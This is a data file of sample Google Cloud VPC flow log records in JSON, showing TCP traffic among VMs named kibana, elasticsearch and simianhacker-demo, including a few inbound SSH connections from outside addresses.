-{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"203.0.113.93","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"203.0.113.58","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"203.0.113.134","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"203.0.113.93","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"203.0.113.134","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
-{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"203.0.113.134","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"203.0.113.134","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
